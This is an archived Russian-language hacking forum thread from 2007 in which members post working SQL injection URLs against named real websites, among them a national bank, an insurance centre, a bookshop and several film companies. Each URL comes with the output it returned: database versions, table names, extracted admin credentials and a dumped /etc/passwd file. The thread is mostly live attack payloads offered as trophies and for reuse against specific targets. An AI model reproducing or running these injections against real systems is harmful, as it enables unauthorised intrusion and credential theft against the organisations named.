HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3471  
Старый 30.10.2007, 15:34
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Национальный банк Таджикистана...
http://www.nbt.tj/en/?c=44&id=44&a=1+union+select+1,version(),user(),4, 5/*
 
Ответить с цитированием

  #3472  
Старый 30.10.2007, 16:04
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

arhd.ru
Код:
http://arhd.ru/element.html?rid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.0.23-log:arhd:arhd@213.219.217.68
 
Ответить с цитированием

  #3473  
Старый 30.10.2007, 16:37
Elvis000
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
Провел на форуме:
4901399

Репутация: 1035


По умолчанию

Fashion Time фото


Код:
http://www.ft-foto.ru/stat.php?action=article_view&id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
user: ft_foto_ru@localhost
version: 5.0.24a-log
database: ft_foto_ru
 
Ответить с цитированием

  #3474  
Старый 30.10.2007, 18:20
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,3,4,5,6,7,8,9/*
база

Код HTML:
http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,password,4,username,6,7,8,9+FROM+users/*
вход в админку

Код HTML:
http://www.triantaphyllides.org/admin/login.php?accessdenied=%2Fadmin%2Findex.php
 
Ответить с цитированием

  #3475  
Старый 30.10.2007, 19:18
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.corkaghpark.com/newscontent.php?id=-90%20UNION%20SELECT%201,2,3,passwd,username+FROM+users/*
пасс зашифрован, только он супер лёгкий...админка зато офигенная )

Последний раз редактировалось KEHT33; 30.10.2007 в 19:21..
 
Ответить с цитированием

  #3476  
Старый 30.10.2007, 21:59
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.aic.ie/site/newscontent.php?id=-8%20UNION%20SELECT%201,2,passwd,4,5+FROM+admin/*
всё думаю пнятно
 
Ответить с цитированием

  #3477  
Старый 30.10.2007, 23:40
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

bookshop.ua
Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name: Shop2
system_user: webuser
Вот первые 100 таблиц:
Код:
http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TypePaher','News','Visits_page','all_kn_z_1','Post','__BAKU','__Export','__OzonPicturesBig','__OzonPicturesSmall','__vw_baku','_Temp_New_Price_FileName','_vw_All_Book','_vw_BigMir_XML_currency','_vw_BigMir_XML_Item','_vw_BigMir_XML_Price','_vw_BookLit_Price','_vw_Coef_For_Report_TOP1000','_vw_CustomerGross','_vw_DeliveryToPayment','_vw_Discount_Book','_vw_New_Publishing','_vw_New_SeriesThema','_vw_OBV_Catalog','_vw_OBV_Export_1','_vw_Price','_vw_Report_TOP50_Author','_vw_Report_TOP50_Publishig','_vw_site_Menu','_vw_Subscribe_News','_vw_View_Zayavka','1c','Account_Jur','Account_Private','Action','all_kn_z','BHV','Bonus','Book_for_portal','BooksPrice','BooksZakaz','bs_ozon','BSM_BooksPrice','CatalogBooks','CatalogNum','CatalogThema','Club','Coef','cost_delivery','CounDaliv','Country','Currency','CurrencyUse','Dalivery','Date_Export','Doc','Dolg_Books','Dolg_Books_K','Dolg_Books2','Dostavka','dtproperties','Enterprise','Entr_D','Exchange','FD','ForgetOrder','GuestBook','Instore','komplekt_z','komplekt_zakaz','Konkurs','MaxRealReestrK_ID','MaxRealReestrP_ID','Message','MessageInProcedure','MiniPortal','NameNews','Not_Form_Ozon','NotMoney_NP','Obzor','Opl_N_Otpr','Other_Z_Kn','Pather','Payment','Picture_URL','Portal','Portal_Books','Postperevod','PP_ACTION','PP_ADM','PP_NAMES','PP_PAYMENTS','PP_TYPE','Publishing','QuestAnk','Question','QuestionAnswer','Quickly','ReestrK','ReestrP','Regions','Release','SendNews','Series','Shipment','Statement','subscriber','subscription','sysconstraints','syssegments','Talk','tbl_BookAdvice','tbl_Catalog','tbl_Catalog_To_Best','tbl_Catalog_TOP5_Best','tbl_CatalogToGoods','tbl_CatologTree','tbl_CorparateOrder','tbl_DistrictUa'))--
Код:
http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+cast(admPwd+as+nvarchar)%2B%27%3A%27%2Bcast(SMTPpwd+as+%20nvarchar)+%2B%27%3A%27%2Bcast(SMTPuser+as+%20nvarchar)+from+PP_ADM)--
xx:xx:GeneralManager
Админку не нашел
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #3478  
Старый 31.10.2007, 00:00
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

Цитата:
http://deznet.ru/cat.php?category=-1+union+select+1,2,version(),4,5,6,database(),user (),9,10,11,12,13/*
deznetr_infectio@localhost
5.0.45-log
deznetr_dez
 
Ответить с цитированием

  #3479  
Старый 31.10.2007, 09:15
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

www.rusins.ru - Русский Страховой Центр
Код:
http://www.rusins.ru/ru/index.php?newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9/*
4.0.20-log:rusins:rusins@localhost

www.csr.ru - Центр Стратегических Разработок
Код:
http://www.csr.ru/theme/theme.php?idt=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
4.0.14-standard-log:csr:root@localhost
Код:
http://www.csr.ru/theme/theme.php?idt=-1+union+select+load_file(0x2f6574632f706173737764)+from+mysql.user/*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
 
Ответить с цитированием

  #3480  
Старый 31.10.2007, 13:07
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

http://www.coogans-run.co.uk/
Код:
http://www.coogans-run.co.uk/h/steve-coogan-newsitem.php?id=-50+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+users/*
Админку или любое другое поле для авторизации найти не смог...
Version: 4.1.20
User: hullabal00@193.111.201.160


http://www.odeonfilm.de/
Код:
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63,64+from+users/*
В таблице users нашел только колонку с именами - login, а вот с пассами не смог...
Version: 4.0.24_Debian-10sarge2-log
User: odeonfilm@localhost


http://www.kino.com/
Код:
http://www.kino.com/theatrical/th_item.php?film_id=-778+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
Version: 4.0.12-standard
User: kino@lma671.siteprotect.com


http://www.zebrafilm.pl/
Код:
http://www.zebrafilm.pl/index.php?page=filmy&lang=eng&sub=fabula&sub2=details&filmID=-77+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,version(),28,29,30/*
Version: 5.0.45-log
User: zebrafilm@aoc175.rev.netart.pl
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ